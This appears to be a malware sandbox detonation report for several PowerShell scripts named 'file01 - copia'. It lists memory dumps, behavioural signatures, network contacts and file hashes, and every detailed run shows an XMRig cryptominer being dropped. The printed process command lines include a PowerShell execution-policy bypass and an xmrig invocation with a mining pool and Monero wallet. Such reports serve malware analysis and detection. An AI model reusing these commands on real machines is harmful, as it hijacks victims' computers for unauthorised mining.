memory/4536-54-0x00000194A0ED0000-0x00000194A0EF0000-memory.dmp

memory/4536-53-0x00000194A0EB0000-0x00000194A0ED0000-memory.dmp

memory/4536-52-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-55-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-56-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-57-0x00000194A0EB0000-0x00000194A0ED0000-memory.dmp

memory/4536-58-0x00000194A0ED0000-0x00000194A0EF0000-memory.dmp

memory/4536-59-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-60-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-61-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-62-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-63-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-64-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-65-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-66-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-67-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-68-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-69-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-70-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-71-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-72-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-73-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-74-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-75-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-76-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-77-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-78-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-79-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-80-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-81-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-82-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-83-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-84-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-85-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-86-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-87-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-88-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-89-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-90-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-91-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-92-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-93-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-94-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-95-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-96-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-97-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-98-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-99-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-100-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-101-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-102-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-103-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-104-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-105-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-106-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-107-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-108-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-109-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-110-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-111-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-112-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-113-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-114-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-115-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-116-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

memory/4536-117-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 23.62.61.144:443 www.bing.com tcp
US 8.8.8.8:53 144.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/4556-0-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/4556-1-0x000002A7E9A80000-0x000002A7E9AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xra30x2i.gbt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4556-11-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4556-12-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4556-14-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4556-15-0x000002A7E9F70000-0x000002A7E9F82000-memory.dmp

memory/4556-16-0x000002A7E9F60000-0x000002A7E9F6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3408-47-0x000002073C3E0000-0x000002073C400000-memory.dmp

memory/4556-48-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/4556-49-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/3408-50-0x00000207D0340000-0x00000207D0360000-memory.dmp

memory/3408-51-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-52-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-54-0x00000207D09C0000-0x00000207D09E0000-memory.dmp

memory/3408-53-0x00000207D0790000-0x00000207D07B0000-memory.dmp

memory/4556-56-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/3408-55-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-57-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-59-0x00000207D09C0000-0x00000207D09E0000-memory.dmp

memory/3408-58-0x00000207D0790000-0x00000207D07B0000-memory.dmp

memory/3408-60-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-61-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-62-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-63-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-64-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-65-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-66-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-67-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-68-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-69-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-70-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-71-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-72-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-73-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-74-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-75-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-76-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-77-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-78-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-79-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-80-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-81-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-82-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-83-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-84-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-85-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-86-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-87-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-88-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-89-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-90-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-91-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-92-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-93-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-94-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-95-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-96-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-97-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-98-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-99-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-100-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-101-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-102-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-103-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-104-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-105-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-106-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-107-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-108-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-109-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-110-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-111-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-112-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-113-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-114-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-115-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-116-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-117-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

memory/3408-118-0x00007FF7C4660000-0x00007FF7C5293000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win11-20240426-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1604-0-0x00007FFC142F3000-0x00007FFC142F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xiadtx1c.t1e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1604-10-0x0000025C4C880000-0x0000025C4C8A2000-memory.dmp

memory/1604-9-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-11-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-12-0x00007FFC142F0000-0x00007FFC14DB2000-memory.dmp

memory/1604-14-0x0000025C4CC30000-0x0000025C4CC42000-memory.dmp

memory/1604-15-0x0000025C4C8F0000-0x0000025C4C8FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:40

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l04t1cqj.ad1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuy4jagk.aqe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:07

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1746s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
